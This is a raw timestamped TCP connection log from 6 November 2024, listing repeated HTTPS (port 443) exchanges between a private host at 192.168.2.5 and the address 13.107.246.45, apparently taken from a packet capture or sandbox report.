                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.454688072 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.454827070 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.500010014 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.500025988 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.692053080 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.693912983 CET62052443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.693941116 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.694632053 CET62052443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.694637060 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.767182112 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.767858982 CET62053443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.767872095 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.783113003 CET62053443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.783122063 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901576996 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901655912 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901714087 CET62052443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901928902 CET62052443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901947975 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901982069 CET62052443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.901987076 CET4436205213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.905061960 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.905102015 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.905175924 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.905345917 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.905364037 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911717892 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911788940 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911844015 CET62053443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911926031 CET62053443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911942959 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911952019 CET62053443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.911958933 CET4436205313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.914916992 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.914956093 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.915062904 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.915182114 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:57.915193081 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.005088091 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.005635977 CET62054443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.005656004 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.006114006 CET62054443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.006119013 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135148048 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135174990 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135219097 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135271072 CET62054443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135545015 CET62054443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135554075 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135579109 CET62054443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.135584116 CET4436205413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.138636112 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.138663054 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.138725996 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.138902903 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.138916016 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.217585087 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.218002081 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.218023062 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.218452930 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.218457937 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.359420061 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.359879017 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.359992981 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.360033035 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.360048056 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.360057116 CET62055443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.360063076 CET4436205513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.362900972 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.362941980 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.363012075 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.363153934 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.363168955 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.646394968 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.646903038 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.646939039 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.647409916 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.647418022 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.647690058 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.647993088 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.648015976 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.648453951 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.648458004 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776364088 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776437044 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776650906 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776900053 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776920080 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776931047 CET62057443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.776937008 CET4436205713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.778964043 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.778986931 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779021978 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779052973 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779089928 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779218912 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779234886 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779246092 CET62056443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779249907 CET4436205613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779916048 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.779942989 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.780008078 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.780164003 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.780183077 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.781253099 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.781286001 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.781369925 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.781476974 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.781492949 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.865739107 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.866446972 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.866467953 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.866934061 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.866945028 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996025085 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996054888 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996098995 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996114016 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996248007 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996479034 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996490955 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996500015 CET62058443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.996505022 CET4436205813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.999452114 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.999490023 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.999556065 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.999694109 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:58.999707937 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.093049049 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.093889952 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.093926907 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.094454050 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.094460964 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.234783888 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.234862089 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.234985113 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.235270023 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.235292912 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.235308886 CET62059443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.235321999 CET4436205913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.238857985 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.238919973 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.239008904 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.239203930 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.239217043 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.509597063 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.514998913 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.515028000 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.515492916 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.515500069 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.550302982 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.552567959 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.552602053 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.553066969 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.553071976 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.641801119 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.641987085 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.642050028 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.642209053 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.642229080 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.642271996 CET62060443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.642277002 CET4436206013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.646008968 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.646054983 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.646145105 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.646317959 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.646330118 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.707739115 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.707804918 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.707989931 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.708319902 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.708342075 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.708353043 CET62061443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.708359003 CET4436206113.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.712131023 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.712165117 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.712229013 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.712769985 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.712784052 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.731162071 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.731653929 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.731678009 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.732440948 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.732446909 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.861377954 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.861465931 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.861774921 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.862915993 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.862936020 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.863040924 CET62062443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.863046885 CET4436206213.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.868900061 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.868952036 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.869604111 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.869856119 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.869868994 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.981138945 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.990744114 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.990777969 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.991755962 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:39:59.991760969 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.118789911 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.118980885 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.119044065 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.211524963 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.211525917 CET62063443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.211570978 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.211585999 CET4436206313.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.215121984 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.215173960 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.215306044 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.215420961 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.215436935 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.412317991 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.412870884 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.412894011 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.413263083 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.413268089 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.452322006 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.452775955 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.452802896 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.453099966 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.453105927 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.546782017 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.546814919 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.546859980 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.546987057 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.546988010 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.547194004 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.547218084 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.547234058 CET62064443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.547239065 CET4436206413.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.550631046 CET62068443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.550674915 CET4436206813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.550762892 CET62068443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.550925016 CET62068443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.550944090 CET4436206813.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.582915068 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.582973003 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.583131075 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.583175898 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.583190918 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.583221912 CET62065443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.583234072 CET4436206513.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.585524082 CET62069443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.585547924 CET4436206913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.585628986 CET62069443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.585777044 CET62069443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.585784912 CET4436206913.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.619555950 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.620044947 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.620062113 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.620430946 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.620436907 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.749876976 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.749902964 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.749942064 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.750000954 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.750039101 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.750222921 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.750231028 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.750240088 CET62066443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.750243902 CET4436206613.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.752600908 CET62070443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.752649069 CET4436207013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.752732992 CET62070443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.752875090 CET62070443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.752891064 CET4436207013.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.946037054 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.946723938 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.946758032 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.947252035 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:00.947257042 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073013067 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073380947 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073483944 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073740005 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073762894 CET4436206713.107.246.45192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073775053 CET62067443192.168.2.513.107.246.45
                                                                                                                                                                                                                            Nov 6, 2024 14:40:01.073781013 CET4436206713.107.246.45192.168.2.5
